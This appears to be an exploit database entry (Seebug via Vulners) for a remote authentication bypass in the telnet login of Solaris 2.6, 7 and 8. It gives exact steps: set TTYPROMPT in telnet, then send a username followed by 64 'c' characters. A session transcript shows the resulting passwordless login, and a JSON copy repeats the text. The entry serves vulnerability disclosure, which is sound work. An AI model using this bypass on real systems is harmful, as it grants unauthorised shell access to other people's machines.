Search...

Solaris 2.6/7/8 (TTYPROMPT in.telnet) Remote Authentication Bypass

2007-09-20T00:00:00

ID SSV:7298
Type seebug
Reporter Root
Modified 2007-09-20T00:00:00

Description

No description provided by source.

                                        
                                            
                                                Solaris TTYPROMPT Security Vulnerability (Telnet)

This vulnerability is very simple to exploit, since it does not require 
any code to be compiled by an attacker. The vulnerability only requires 
the attacker to simply define the environment variable TTYPROMPT to a 
6-character string, inside telnet. Jonathan believes this overflows an 
integer inside login, which specifies whether the user has been 
authenticated (just a guess).

Once connected to the remote host, you must type the username, followed 
by 64 &amp;quot; c&amp;quot;s, and a literal &amp;quot;
&amp;quot;. You will then be logged in as the user 
without any password authentication. This should work with any account 
except root (unless remote root login is allowed). 

Example: 
coma% telnet 
telnet&amp;gt; environ define TTYPROMPT abcdef 
telnet&amp;gt; o localhost 

SunOS 5.8 

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
 
Last login: whenever 
$ whoami bin 

# sebug.net

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-7298", "status": "poc", "bulletinFamily": "exploit", "modified": "2007-09-20T00:00:00", "title": "Solaris 2.6/7/8 (TTYPROMPT in.telnet) Remote Authentication Bypass", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-7298", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2007-09-20T00:00:00", "sourceData": "\n Solaris TTYPROMPT Security Vulnerability (Telnet)\r\n\r\nThis vulnerability is very simple to exploit, since it does not require \r\nany code to be compiled by an attacker. The vulnerability only requires \r\nthe attacker to simply define the environment variable TTYPROMPT to a \r\n6-character string, inside telnet. Jonathan believes this overflows an \r\ninteger inside login, which specifies whether the user has been \r\nauthenticated (just a guess).\r\n\r\nOnce connected to the remote host, you must type the username, followed \r\nby 64 &quot; c&quot;s, and a literal &quot;\r\n&quot;. You will then be logged in as the user \r\nwithout any password authentication. This should work with any account \r\nexcept root (unless remote root login is allowed). \r\n\r\nExample: \r\ncoma% telnet \r\ntelnet&gt; environ define TTYPROMPT abcdef \r\ntelnet&gt; o localhost \r\n\r\nSunOS 5.8 \r\n\r\nbin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\r\n \r\nLast login: whenever \r\n$ whoami bin \r\n\r\n# sebug.net\n ", "id": "SSV:7298", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T22:02:35", "reporter": "Root", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2017-11-19T22:02:35", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T22:02:35", "rev": 2}, "vulnersScore": 0.1}, "references": []}